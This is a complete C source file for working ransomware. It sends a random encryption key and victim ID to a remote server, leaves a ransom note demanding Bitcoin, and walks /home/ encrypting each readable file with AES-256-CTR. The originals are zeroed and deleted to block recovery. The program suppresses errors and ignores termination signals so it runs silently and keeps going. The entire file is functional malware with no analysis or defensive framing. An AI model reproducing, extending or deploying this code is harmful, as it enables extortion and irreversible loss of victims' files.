#include <arpa/inet.h>
#include <ftw.h>
#include <netdb.h>
#include <netinet/in.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/kdf.h>
#include <openssl/rand.h>
#include <openssl/sha.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define PORT "3490"

#define HOST "localhost"

#define MAXDATASIZE 100

#define EXTENSION ".ransomed"

const EVP_CIPHER *cipher = NULL;
unsigned char key[EVP_MAX_KEY_LENGTH] = {0};
unsigned char iv[EVP_MAX_IV_LENGTH] = {0};
unsigned char mac[SHA256_DIGEST_LENGTH] = {0};
unsigned char hmac_key[SHA256_DIGEST_LENGTH] = {0};
const EVP_MD *digest;

EVP_CIPHER_CTX *ctx;

unsigned char salt[SHA256_DIGEST_LENGTH];

unsigned char random_id[SHA256_DIGEST_LENGTH];
unsigned char random_key[SHA256_DIGEST_LENGTH];

void write_note(char *base64_id_string) {

  FILE *note = fopen("RANSOM_NOTE", "wb");
  if (note != NULL) {
    fprintf(
        note,
        "Your files have been encrypted. A unique ID token has been assigned to\
you and is shown below. Send this ID token along with $x in BitCoin\
to xxx@xxx to retrieve the decryption program and your key.\n\n\
ID token: %s\n",
        base64_id_string);
    fclose(note);
  }
}

void sighandler(int s) { sleep(1); }

void *get_in_addr(struct sockaddr *sa) {
  if (sa->sa_family == AF_INET) {
    return &(((struct sockaddr_in *)sa)->sin_addr);
  }

  return &(((struct sockaddr_in6 *)sa)->sin6_addr);
}

/* Sends random key and correlating ID to server encoded in base64 */
/* Returns base64 ID string to caller */
unsigned char *send_credentials(unsigned char *id, unsigned char *key) {
  int sockfd;
  struct addrinfo hints, *servinfo, *p;
  int rv;
  char s[INET6_ADDRSTRLEN];

  memset(&hints, 0, sizeof hints);
  hints.ai_family = AF_UNSPEC;
  hints.ai_socktype = SOCK_STREAM;

  if ((rv = getaddrinfo(HOST, PORT, &hints, &servinfo)) != 0) {
    return NULL;
  }

  for (p = servinfo; p != NULL; p = p->ai_next) {
    if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
      continue;
    }

    if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
      close(sockfd);
      continue;
    }

    break;
  }

  if (p == NULL) {
    return NULL;
  }

  inet_ntop(p->ai_family, get_in_addr((struct sockaddr *)p->ai_addr), s,
            sizeof s);

  freeaddrinfo(servinfo);

  static unsigned char base64_id[45];
  unsigned char base64_key[45];

  EVP_EncodeBlock(base64_id, id, SHA256_DIGEST_LENGTH);
  EVP_EncodeBlock(base64_key, key, SHA256_DIGEST_LENGTH);

  unsigned char credential_string[90];

  sprintf((char *restrict)credential_string, "%s %s", base64_id, base64_key);

  send(sockfd, credential_string, strlen((const char *)credential_string), 0);

  close(sockfd);

  return base64_id;
}

/* Encrypts and overwrites file receieved by ftw */
/* Do not print any error messages so process is silent */
int file_crypt(const char *file_name) {
  struct stat st;
  stat(file_name, &st);

  /* Do not to attempt to encrypt FIFOs, symlinks, block devices,
   * sockets, empy files, or files without read/write access */
  if (S_ISFIFO(st.st_mode)) {
    return 1;
  }

  if (S_ISLNK(st.st_mode)) {
    return 1;
  }

  if (S_ISBLK(st.st_mode)) {
    return 1;
  }

  if (S_ISSOCK(st.st_mode)) {
    return 1;
  }

  if (st.st_size < 1) {
    return 1;
  }

  if (access(file_name, R_OK | W_OK) != 0) {
    return 1;
  }

  size_t file_size = st.st_size;
  unsigned int buffer_size = 1024;
  int outlen = 0, inlen = 0;
  size_t written = 0;

  unsigned char in_buffer[buffer_size + EVP_MAX_BLOCK_LENGTH];
  unsigned char out_buffer[buffer_size + EVP_MAX_BLOCK_LENGTH];

  FILE *file = fopen(file_name, "rb");
  if (file == NULL) {
    return 1;
  }

  /* Append EXTENSION to new_file_name */
  char new_file_name[strlen(file_name) + strlen(EXTENSION) + 1];
  strcpy(new_file_name, file_name);
  strcat(new_file_name, EXTENSION);

  FILE *new_file = fopen(new_file_name, "wb");
  if (new_file == NULL) {
    return 1;
  }

  if (!RAND_bytes(salt, sizeof(salt))) {
    return 1;
  }

  cipher = EVP_get_cipherbyname("aes-256-ctr");
  digest = EVP_get_digestbyname("sha512");

  if (!PKCS5_PBKDF2_HMAC((char *)random_key, SHA256_DIGEST_LENGTH, salt,
                         sizeof(salt), 1000, digest,
                         EVP_CIPHER_key_length(cipher), key)) {
    OPENSSL_cleanse(key, sizeof(key));
    return 1;
  }

  if (EVP_CIPHER_iv_length(cipher) != 0) {
    if (!PKCS5_PBKDF2_HMAC((char *)random_key, SHA256_DIGEST_LENGTH, salt,
                           sizeof(salt), 1, digest,
                           EVP_CIPHER_iv_length(cipher), iv)) {
      OPENSSL_cleanse(key, sizeof(key));
      return 1;
    }
  }

  /* Derive separate authentication key */
  EVP_PKEY_CTX *pctx;

  size_t pkey_outlen = sizeof(hmac_key);
  pctx = EVP_PKEY_CTX_new_id(EVP_PKEY_HKDF, NULL);

  if (EVP_PKEY_derive_init(pctx) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_set_hkdf_md(pctx, EVP_sha256()) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_set1_hkdf_key(pctx, key, sizeof(key)) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_add1_hkdf_info(pctx, "authkey", strlen("authkey")) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_derive(pctx, hmac_key, &pkey_outlen) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }

  EVP_PKEY_CTX_free(pctx);

  HMAC_CTX *hmac_ctx = HMAC_CTX_new();
  HMAC_Init_ex(hmac_ctx, hmac_key, sizeof(hmac_key), EVP_sha256(), NULL);

  /* Include IV in authenticated data */
  HMAC_Update(hmac_ctx, iv, EVP_CIPHER_iv_length(cipher));

  ctx = EVP_CIPHER_CTX_new();
  EVP_CIPHER_CTX_init(ctx);

  EVP_CipherInit_ex(ctx, cipher, NULL, key, iv, 1);

  size_t remaining = file_size;
  while (remaining) {

    if (buffer_size > remaining)
      buffer_size = remaining;

    inlen = fread(in_buffer, sizeof(char), buffer_size, file);

    if (!EVP_CipherUpdate(ctx, out_buffer, &outlen, in_buffer, inlen)) {
      OPENSSL_cleanse(key, sizeof(key));
      HMAC_CTX_free(hmac_ctx);
      EVP_CIPHER_CTX_cleanup(ctx);
      return 1;
    }

    /* Authenticate cipher-text, a la Encrypt-then-MAC */
    HMAC_Update(hmac_ctx, out_buffer, outlen);

    if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
      OPENSSL_cleanse(key, sizeof(key));
      HMAC_CTX_free(hmac_ctx);
      EVP_CIPHER_CTX_cleanup(ctx);
      return 1;
    }

    written += outlen;
    remaining -= buffer_size;
  }

  /* Encrypt and authenticate last block of cipher-text if using CBC */
  outlen = 0;

  if (!EVP_CipherFinal_ex(ctx, out_buffer, &outlen)) {
    OPENSSL_cleanse(key, sizeof(key));
    HMAC_CTX_free(hmac_ctx);
    EVP_CIPHER_CTX_cleanup(ctx);
    return 1;
  }

  if (outlen > 0)
    written += outlen;

  HMAC_Update(hmac_ctx, out_buffer, outlen);

  if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
    OPENSSL_cleanse(key, sizeof(key));
    HMAC_CTX_free(hmac_ctx);
    EVP_CIPHER_CTX_cleanup(ctx);
    return 1;
  }

  unsigned int hmac_len = written + EVP_CIPHER_iv_length(cipher);

  HMAC_Final(hmac_ctx, mac, &hmac_len);
  HMAC_CTX_free(hmac_ctx);

  /* Write salt and MAC as footer */
  if (fwrite(salt, sizeof(unsigned char), sizeof(salt), new_file) !=
      sizeof(salt)) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_CIPHER_CTX_cleanup(ctx);
    return 1;
  }

  if (fwrite(mac, sizeof(unsigned char), sizeof(mac), new_file) !=
      sizeof(mac)) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_CIPHER_CTX_cleanup(ctx);
    return 1;
  }

  EVP_CIPHER_CTX_cleanup(ctx);

  fclose(file);
  fclose(new_file);

  FILE *old_file = fopen(file_name, "wb");
  if (old_file == NULL) {
    OPENSSL_cleanse(key, sizeof(key));
    return 1;
  }

  char zero_buffer[buffer_size];
  memset(zero_buffer, 0, buffer_size);

  /* Overwrite a megabyte (or all) of the file before removing to
   * disallow file recovery. */
  if (file_size < (1024 * 1024)) {
    remaining = file_size;
  } else {
    remaining = 1024 * 1024;
  }
  while (remaining) {

    if (buffer_size > remaining)
      buffer_size = remaining;

    fwrite(zero_buffer, sizeof(char), buffer_size, old_file);

    remaining -= buffer_size;
  }

  remove(file_name);

  /* Make sure the random key is not left in memory */
  OPENSSL_cleanse(key, sizeof(key));

  return 0;
}

static int traverse_dir(const char *fpath, const struct stat *sb, int tflag) {
  /* Send the filename to file_crypt if it is a physical file and
   * does not have the pattern defined in EXTENSION */
  if (tflag == FTW_F) {
    if (strstr(fpath, EXTENSION) == NULL &&
        strstr(fpath, "RANSOM_NOTE") == NULL) {
      file_crypt(fpath);
    }
  }

  return 0;
}

int main(int argc, char *argv[]) {

  /* Catch SIGHUP and SIGINT so child will not stop if parent is
   * interrupted or calling terminal is closed */
  signal(SIGHUP, sighandler);
  signal(SIGINT, sighandler);
  signal(SIGTERM, sighandler);

  OpenSSL_add_all_algorithms();

  if (!RAND_bytes(random_id, sizeof(random_id))) {
    return 1;
  }

  if (!RAND_bytes(random_key, sizeof(random_key))) {
    return 1;
  }

  unsigned char *base64_id_string;

  /* Send credentials to the server. If server cannot be reached,
   * sleep for 1 second before trying again */
  while (1) {
    base64_id_string = send_credentials(random_id, random_key);
    if (base64_id_string != NULL)
      break;
    sleep(1);
  }

  write_note(base64_id_string);

  /* Recursively walk user's home directory, sending appropriate files
   * to file_crypt */
  ftw("/home/", traverse_dir, 20);

  /* Make sure the random_key that key was derived from is not left
   * in memory */
  OPENSSL_cleanse(random_key, sizeof(random_key));

  exit(EXIT_SUCCESS);
}
